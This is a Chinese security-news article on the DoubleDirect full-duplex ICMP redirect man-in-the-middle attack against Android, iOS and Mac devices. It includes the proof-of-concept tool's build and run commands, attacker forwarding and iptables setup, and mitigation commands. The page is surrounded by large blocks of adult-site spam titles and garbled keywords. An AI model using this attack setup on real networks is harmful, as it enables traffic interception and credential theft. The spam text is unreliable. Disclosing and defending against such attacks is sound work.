精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

劍指Android和iOS系統的中間人攻擊技術

安全 黑客攻防
安全研究員發現一種新型的中間人攻擊技術——DoubleDirect,它的攻擊目標主要是運行Android系統和iOS系統的智能手機和平板電腦。

安全研究員發現一種新型的中間人攻擊技術,它的攻擊目標主要是運行Android系統和iOS系統的智能手機和平板電腦。

這種被稱為DoubleDirect的技術屬于中間人(MITM)攻擊的一種。攻擊者可以利用這種技術把受害者訪問谷歌、Facebook、Twitter上的流量重定向到攻擊者控制的設備上,而一旦受害者的流量被重定向了,攻擊者就可竊取受害者的私人數據,比如,郵箱ID、登錄憑證、銀行信息等,當然他還可以在受害者的機器上安裝木馬等惡意軟件。

劍指Android和iOS的DoubleDirect中間人攻擊

舊金山的一家移動安全公司Zimperium在其博客中詳細介紹了這一威脅。黑客正在利用DoubleDirect技術進行針對性攻擊,范圍包括美國、英國、加拿大在內的31個國家,5大互聯網巨頭——Google,Facebook,Hotmail,Live.com和Twitter

[[123178]]

全雙工的ICMP重定向中間人攻擊

ICMP攻擊是中間人攻擊(MITM)的一種,傳統的ICMP重定向攻擊及其利用工具則類似于ettercap +半雙工中間人攻擊(MITM)。受害者因為ICMP重定向攻擊被欺騙,路由器因為ARP欺騙攻擊被毒化。這種ICMP攻擊可以通過防御ARP攻擊的傳統手段相對輕松的防御住。

而DoubleDirect則有所不同,它通過ICMP(網間控制報文協議)重定向數據包改變主機路由表。ICMP重定向數據包會告訴主機有一個更好的路由路徑可以達到目的地。改變受害者機器上的路由表可以使任意的網絡流量流向特定的IP地址(比如攻擊者的IP),然后攻擊者就可以從中作梗發動中間人攻擊了。在流量被重定向之后,攻擊者可通過利用客戶端漏洞攻擊受害者的設備,從而訪問受害者的網絡。

通過研究DoubleDirect攻擊,我們發現攻擊者通過目前未知的技術,實現了全雙工的ICMP重定向中間人攻擊。而傳統的ICMP重定向攻擊是有半雙工限制的。

DoubleDirect攻擊是如何工作的?

Zimperium移動安全實驗室在研究該攻擊之后創建了一個攻擊測試工具,它可以證明發動全雙工ICMP重定向攻擊是有可能的。ICMP重定向攻擊的難點在于,攻擊者必須預先知道受害者已經可到達的IP地址。

攻擊者怎樣知道受害者可達的IP地址呢?要回答這個問題我們應該先分析受害者的設備。

例如,當我們在瀏覽器中輸入www.zimperium.com時,應用程序會發送一個DNS請求以找出www.zimperium.com主機的IP地址。

首先,我們會用ICMP重定向數據包把受害者設備上的所有DNS流量轉發到我們的設備上。大多數時候我們都能預測到受害者使用的DNS服務器。

如果受害者與我們在同個局域網(LAN),那么受害者的DNS服務器也很有可能與我們通過DHCP(動態主機配置協議)所獲得的DNS服務器相同。當然,有些移動設備使用的是默認的DNS服務器(8.8.8.8或者 8.8.4.4)。

我們還提供了一個簡單有效的工具來研究DoubleDirect,單擊這里即可下載。

如果想編譯和運行這個工具,你需要在系統上安裝libcrafter(https://code.google.com/p/libcrafter/)。libcrafter是一個C++開發的跨平臺庫,可以用來抓包和解包。在GNU/linux或者MAC OS X系統上編譯,你需要執行以下的命令:

$ git clone https://github.com/pellegre/libcrafter
$ cd libcrafter/libcrafter
$ ./autogen.sh
$ make
$ sudo make install
$ sudo ldconfig

值得注意的是,在配置libcrafter之前你需要安裝抓包工具libpcap:

#apt-get install libpcap-dev

#p#

DoubleDirect實例:全雙工ICMP重定向攻擊

場景再現

網關=192.168.1.1

攻擊機(Ubuntu)=192.168.1.105

受害機(GalaxyS4)=192.168.1.101

受害機配置

首先需要做的是,檢查設備是否支持重定向。GalaxyS4會默認支持重定向:

# cat /proc/sys/net/ipv4/conf/all/accept_redirects 1

其次,如果你的設備不支持ICMP重定向但你又想測試這一攻擊,那可以執行下面的命令:

# echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects

攻擊機配置

為了保證攻擊的正確進行,我們需要在攻擊者設備上執行一些命令:

對數據流量進行轉發(該方式具有暫時性,重啟便失效。要想長久保持轉發需要修改/etc/sysctl.conf)

# echo 1 > /proc/sys/net/ipv4/ip_forward

關閉攻擊機的重定向設置。這很重要!我們需要告訴告訴攻擊設備的內核:不要發送重定向

# echo 0 > /proc/sys/net/ipv4/conf/all/send_redirect

攻擊演示

編譯DoubleDirect_poc.cpp文件:

$ g++ doubledirect_poc.cpp -o doubledirect_poc -lcrafter
$ ./doubledirect_poc
[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****
[#] Usage: ./doubledirect_poc [options]

POC選項:

-i 指定網絡接口

-v 受害機IP地址

-d 毒化的目標IP

當受害者訪問一些網址時,我們會毒化一個受害者機器可達的遠程IP地址,而不是進行局域網ARP欺騙。然后我們就讓受害者的流量發向我們的設備,而不通過真正的網關。

當設備發送了一個目的地為8.8.8.8的IP數據包時,它本該經過網關(192.168.1.1)……

我們在攻擊者設備上執行:

$ sudo ./doubledirect_poc -i wlan0 -v 192.168.1.101 -d 8.8.8.8
[#] Attack parameters :
[+] Interface : wlan0
[+] Victim IP address : 192.168.1.101
[+] Destination to poison : 8.8.8.8
[#] Gateway parameters :
[+] Gateway IP address : 192.168.1.1
[+] Gateway MAC address : *:*:*:*:AE:51
[#] My parameters :
[+] My IP address : 192.168.1.105

從上面的演示可以看出,我們是怎樣毒化8.8.8.8為我們的IP192.168.1.105的。當受害者發送目的地為8.8.8.8的數據包時,它會把我們的設備作為網關,這樣一來我們就可以嗅探到流向目的地的所有流量了。

一旦所有的DNS流量都通過我們的電腦轉發了,我們通過DNS回應包獲得IP地址,并可以向這些IP地址發送ICMP重定向數據包。這樣,我們不僅能嗅探到受害者的所有DNS流量,還可以完全的將其轉發到我們的設備上。#p#

測試你是否易受DoubleDirect的攻擊,我們可以寫一個bash腳本,利用iptables進行IP轉發:

# cat iptables_dobule_direct.sh
#!/bin/sh
if [ $# -lt 1 ]; then
echo "[@] Usage: `basename ${0}` "
echo "[@] Example: `basename ${0}` wlan0"
exit 0
fi
INTERFACE=${1}
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects
iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat
iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump MASQUERADE
# ./iptables_double_direct.sh wlan0

最后執行Zimperium DoubleDirect攻擊測試工具:

# ./doubledirect_poc -i wlan0 -v 192.168.1.101
[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****
[#] Attack parameters :
[+] Interface : wlan0
[+] Victim IP address : 192.168.1.101
[#] Gateway parameters :
[+] Gateway IP address : 192.168.2.1
[+] Gateway MAC address : 00:1f:*:*:*:*
[#] My parameters :
[+] My IP address : 192.168.2.103

DNS服務器是被硬編進代碼(397行,DoubleDirect_poc.cpp文件)里的。

// Hardcoded DNS servers we want to redirect to our machine
startIcmpRedirectAttack(*redirect_parameters, getGatewayIp(redirect_parameters->_interface)); // Gateway
startIcmpRedirectAttack(*redirect_parameters, "8.8.8.8");
startIcmpRedirectAttack(*redirect_parameters, "8.8.4.4");
startIcmpRedirectAttack(*redirect_parameters, "208.67.222.222");
startIcmpRedirectAttack(*redirect_parameters, "208.67.220.220");

應對策略

Android(安卓)、IOS、Mac OSX設備通常默認支持ICMP重定向。

要想知道你的OS X設備是否易受DoubleDirect攻擊,可以執行以下命令:


sysctl net.inet.ip.redirect | grep ": 1" && echo "DoubleDirect: VULNERABLE" || echo "DoubleDirect: SAFE"

要想使ICMP重定向在Mac失效可以執行以下命令(需要Root權限):

# sysctl -w net.inet.ip.redirect=0

注:這種修復不具有持久性,要想使其長久的有效,你可以重啟之后在命令行中添加啟動腳本。

對于Android來說,大部分的Android設備都會默認支持重定向,要想使其失效,需要root設備并且執行以下命令:

# echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects

哪些設備會受到攻擊

受影響的系統包括

Android設備:大部分Android設備,包括Nexus 5 + Lollipop

iOS設備:最新iOS設備,包括iOS 8.1.1()以外

Mac:Mac OS X Yosemite(優勝美地)

大部分Windows和GNU/Linux用戶不會受到DoubleDirect的攻擊,因為這些操作系統不支持ICMP重定向數據包。

參考來源:http://blog.zimperium.com

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2013-11-11 10:36:04

2012-11-20 13:06:57

2016-09-27 22:45:47

2014-03-20 10:26:58

2017-02-16 08:53:42

2019-01-28 08:59:59

2020-05-07 15:24:22

中間人攻擊MITM

2014-03-17 09:16:08

2014-05-15 10:20:07

2015-12-29 10:41:16

2015-01-05 13:29:37

2014-10-08 09:38:49

2016-10-24 14:23:14

2015-02-26 09:50:04

2009-08-14 11:25:38

2010-06-13 12:06:41

2014-11-21 11:46:55

2010-09-25 14:50:34

2014-05-13 09:23:35

2013-03-21 18:54:23

點贊
收藏

51CTO技術棧公眾號

日韩黄色大片网站| 国产第一页在线| 久久99久久久欧美国产| 欧美成人黑人xx视频免费观看| 欧美熟妇另类久久久久久多毛| 黑人精品视频| 国产日产欧美一区二区三区| 国产主播欧美精品| 亚洲一区欧美在线| 视频在线不卡免费观看| 亚洲第一精品夜夜躁人人爽| 三上悠亚av一区二区三区| 久久五月精品中文字幕| 国产欧美一区二区精品婷婷| 97在线中文字幕| 中文字幕在线播放日韩| 亚洲三级影院| 久久久av一区| 亚洲欧美va天堂人熟伦| 99re8这里有精品热视频8在线| 日本高清免费不卡视频| 精品国产av无码一区二区三区| 国产三级视频在线看| 福利一区在线观看| 成人写真视频福利网| 国产一级一级国产| 精品999成人| 久久综合免费视频影院| 你懂得视频在线观看| 欧美交a欧美精品喷水| 欧美岛国在线观看| 老司机午夜性大片| 国产麻豆一区| 色香蕉成人二区免费| 91九色丨porny丨国产jk| 黄色av免费在线| 国产精品免费免费| 日韩av免费电影| 日本护士...精品国| 成人h动漫精品一区二区| 亚洲曰本av电影| 91麻豆成人精品国产免费网站| 日韩国产精品91| 国产成人午夜视频网址 | 亚洲精品伦理在线| 亚洲福利av| www.91在线| 欧美国产欧美综合| 色姑娘综合网| 在线观看免费高清完整| 欧美高清在线一区| 五月婷婷一区| a中文在线播放| 日本一区二区三区视频视频| 亚洲成人自拍| 黄网址在线观看| 一区二区三区资源| av日韩一区二区三区| yellow在线观看网址| 精品美女久久久久久免费| 奇米精品一区二区三区| 涩涩视频在线播放| 色婷婷av一区二区三区大白胸| 免费黄色日本网站| 成人国产激情| 91精品国产麻豆| 佐佐木明希电影| 人人精品视频| 国产一区二区三区免费视频| 91无套直看片红桃在线观看| 91成人国产| 国语自产精品视频在线看一大j8 | 欧美88888| 91精品国产视频| 欧美激情免费观看| 日韩av大片在线观看| 日韩高清在线不卡| 国产日韩在线亚洲字幕中文| 精品人妻无码一区二区色欲产成人| 高清成人在线观看| 欧美精品一区二区视频| 欧美尤物美女在线| 亚洲一二三四区| 免费激情视频在线观看| 日韩电影免费观看高清完整版在线观看| 欧美一区二区女人| 精品人妻一区二区三区香蕉| 日本在线电影一区二区三区| 欧美激情免费看| 国产裸体美女永久免费无遮挡| 国产精品自拍毛片| 免费一区二区三区在在线视频| 天堂а√在线官网| 午夜一区二区三区视频| 在线观看免费视频高清游戏推荐| 亚洲3区在线| 国产一区二区精品丝袜| 国产在线观看免费视频今夜| 久久一区二区三区四区五区| 亚洲直播在线一区| 成年人视频在线观看免费| 亚洲尤物在线视频观看| 不卡av免费在线| 91蜜桃臀久久一区二区| 在线观看成人黄色| 91精品国产高潮对白| 久久99国产精品久久| 精品欧美日韩在线| 宅男网站在线免费观看| 欧美在线你懂的| 天天躁日日躁狠狠躁av麻豆男男| 日韩欧美大片| 国产999视频| 国产91久久久| 专区另类欧美日韩| 精品免费国产一区二区| 精品久久对白| 色综合视频一区中文字幕| 中文字幕日韩第一页| av成人老司机| 福利视频一二区| 国产精品一区免费在线| 中文字幕久精品免费视频| 精品人妻一区二区三区免费看| 国产很黄免费观看久久| 色中文字幕在线观看| 91成人抖音| 一区二区三欧美| 免费无码国产精品| 久久青草欧美一区二区三区| 妞干网在线观看视频| 大伊香蕉精品在线品播放| 九九视频这里只有精品| 国产女人18毛片18精品| 国产精品久久久久久久久免费桃花 | 国产伦精品一区二区三毛| 午夜影院免费在线| 欧美一级艳片视频免费观看| 国产麻豆视频在线观看| 久久97超碰国产精品超碰| 亚洲精品在线免费| 欧美爱爱视频| 久久久av免费| www.久久综合| 亚洲午夜成aⅴ人片| 色哟哟免费视频| 欧美欧美天天天天操| 动漫一区二区在线| 国内小视频在线看| 亚洲国产欧美一区二区三区同亚洲 | 91在线中文| 欧美一级高清片在线观看| 一级性生活免费视频| 精品一区二区三区在线播放视频| 在线免费一区| 欧美二区观看| 国内精品久久久久久中文字幕| 韩国av免费在线| 天天av天天翘天天综合网| 亚洲乱码国产乱码精品精大量| 国产亚洲精品bv在线观看| 欧美日韩精品综合| 99欧美精品| 欧美成人黄色小视频| 亚洲国产精品18久久久久久| 亚洲福中文字幕伊人影院| 成人免费网站黄| 麻豆精品一区二区综合av| 黄色一级视频播放| 国产人妖ts一区二区| 日本sm极度另类视频| 91网在线播放| 欧美成人一级视频| 51国产偷自视频区视频| 欧美激情在线一区二区| 欧美性猛交xx| 香蕉亚洲视频| 这里只有精品66| japanese色系久久精品| 国产精品99蜜臀久久不卡二区| 在线观看a视频| 精品久久人人做人人爽| 亚洲熟女综合色一区二区三区| 中文字幕中文字幕一区| 69xxx免费视频| 蜜臀久久99精品久久久画质超高清| 青青草原网站在线观看| 亚洲精品进入| 96成人在线视频| 91精品xxx在线观看| 欧美精品一区在线播放| 日韩偷拍自拍| 日韩一级二级三级精品视频| 精品人妻一区二区色欲产成人| 成人欧美一区二区三区| 精品人妻无码一区二区三区| 国产精品一区二区三区四区 | 国产在线看一区| 91视频最新入口| 欧美一区二区三区久久精品| 日韩欧美精品久久| www.神马久久| 91色精品视频在线| 亚洲成人短视频| 97精品视频在线| 日p在线观看| 国产一区二区动漫| 日本高清视频网站| 欧美一级理论片| 亚洲一区二区三区高清视频| 黑人巨大精品欧美一区二区一视频 | 色18美女社区| 久久亚洲色图| 激情综合在线观看| 狠狠入ady亚洲精品经典电影| 一区二区成人国产精品 | 中文字幕一精品亚洲无线一区 | 中文字幕在线一| 欧美日韩亚洲一区二区| 久久网一区二区| 亚洲视频网在线直播| 国精产品视频一二二区| 国产亚洲一二三区| 少妇特黄一区二区三区| 不卡视频一二三| 涩视频在线观看| 国产福利不卡视频| а 天堂 在线| 国产呦精品一区二区三区网站| 精品999在线| 日本美女一区二区三区视频| 欧美少妇性生活视频| 午夜在线视频一区二区区别 | 麻豆中文一区二区| 日本老熟妇毛茸茸| 日本视频中文字幕一区二区三区| 虎白女粉嫩尤物福利视频| 性娇小13――14欧美| 欧美国产亚洲一区| 母乳一区在线观看| 久久久免费视频网站| 性感少妇一区| 91精品国产一区二区三区香蕉 | 国产美女18xxxx免费视频| 日韩和欧美的一区| 茄子视频成人免费观看| 国产免费成人| 欧美伦理视频在线观看| 日本麻豆一区二区三区视频| www.精品在线| 久久91精品国产91久久小草| 91精品999| 国产高清久久久| 亚洲av熟女高潮一区二区| 99久久精品国产毛片| 全黄一级裸体片| 中文一区二区完整视频在线观看| 亚洲 欧美 国产 另类| 亚洲欧美激情小说另类| 黄色一级片在线| 黄色成人在线播放| 亚洲精品中文字幕乱码三区91| 色噜噜久久综合| 97人妻精品一区二区三区视频| 欧美一区二区三区电影| 天堂中文在线官网| 在线观看欧美www| 亚洲制服国产| 57pao成人国产永久免费| www.久久.com| 99视频在线免费观看| 自拍偷拍一区| 在线观看日韩片| 在线播放一区| 欧美性猛交久久久乱大交小说| 国产揄拍国内精品对白| 亚洲观看黄色网| 国产清纯白嫩初高生在线观看91 | 日韩欧美中文第一页| 在线免费观看av片| 亚洲第一视频在线观看| 成年人视频在线看| 久久久久久久久久久免费| 中文字幕系列一区| 国产精品大全| 日韩精品永久网址| 日本a视频在线观看| 日本aⅴ免费视频一区二区三区 | 国产亚洲欧美日韩在线一区| 全网免费在线播放视频入口| 欧美日韩精品在线| 国产三级漂亮女教师| 亚洲摸下面视频| 中文字幕有码在线视频| 国产精品69精品一区二区三区| 日韩精品一区二区三区中文字幕| 欧洲精品码一区二区三区免费看| 亚洲最新色图| 日本激情视频在线| 高清av一区二区| 成人涩涩小片视频日本| 色婷婷狠狠综合| 欧美 日韩 国产 在线| 久久精品国产视频| 欧美日韩美女| 九九九九九精品| 欧美激情一区| 91丝袜超薄交口足| 国产日韩欧美亚洲| 成人免费视频毛片| 亚洲第一网站免费视频| 亚洲精品一线| 国产主播在线一区| 国产中文字幕一区二区三区| 亚洲 欧美 日韩 国产综合 在线 | 欧美做受喷浆在线观看| 夜夜揉揉日日人人青青一国产精品| 亚洲图片小说视频| 国产一区二区三区毛片| 亚洲第一影院| 欧美日韩一区二 | 日本精品黄色| 成熟老妇女视频| xnxx国产精品| 国产成人精品网| 亚洲精品美女在线观看播放| 欧美人与禽性xxxxx杂性| 91久久精品国产91性色| 97精品国产一区二区三区| 欧美性猛交xxx乱久交| 久久久久久久综合日本| 中文字幕视频网| 日韩国产精品亚洲а∨天堂免| 福利在线免费视频| 精品无人区一区二区三区| 一本久久综合| 日本一级片在线播放| 精品国产999| 免费观看成年在线视频网站| 日本中文字幕不卡免费| 精品精品久久| 一个色综合久久| 亚洲精品日产精品乱码不卡| 精品国产无码AV| 欧美激情奇米色| 欧美巨大xxxx| 国产情侣av自拍| 国产精品久久久久毛片软件| 一级黄色片免费| 另类色图亚洲色图| av成人男女| 女人喷潮完整视频| 国产无遮挡一区二区三区毛片日本| 午夜一级黄色片| xxxxx91麻豆| 亚洲精品观看| 国产午夜大地久久| 国产婷婷色一区二区三区在线| 欧美激情一区二区三区免费观看| 日韩在线欧美在线| 欧美不卡在线观看| 成年人网站免费视频| 国产欧美在线观看一区| 在线免费观看高清视频| 欧美国产日产韩国视频| 欧美丝袜美腿| 日本激情综合网| 一区二区三区美女| 日本在线视频1区| 国产精品啪视频| 国产一区欧美| japanese中文字幕| 91麻豆精品国产自产在线观看一区 | 国产精品亲子伦对白| www.亚洲黄色| 国产91色在线|免| 中文视频一区| 精品人妻一区二区三区视频| 欧美日韩精品三区| 136福利第一导航国产在线| 日韩欧美手机在线| 国产精品99久久久久久有的能看 | 视频一区在线播放| 九九热最新地址| 精品中文视频在线| 精品中文字幕一区二区三区四区| 97国产精东麻豆人妻电影 | 国产一区精品二区| 黄色国产精品视频| 亚洲精品国产高清久久伦理二区| 香蕉视频黄在线观看| 91久久精品国产91久久性色| 在线综合亚洲| 三级影片在线看| 在线视频欧美日韩| 牛牛视频精品一区二区不卡| www.cao超碰| 91成人在线免费观看| 青青草原av在线| 一区二区不卡在线|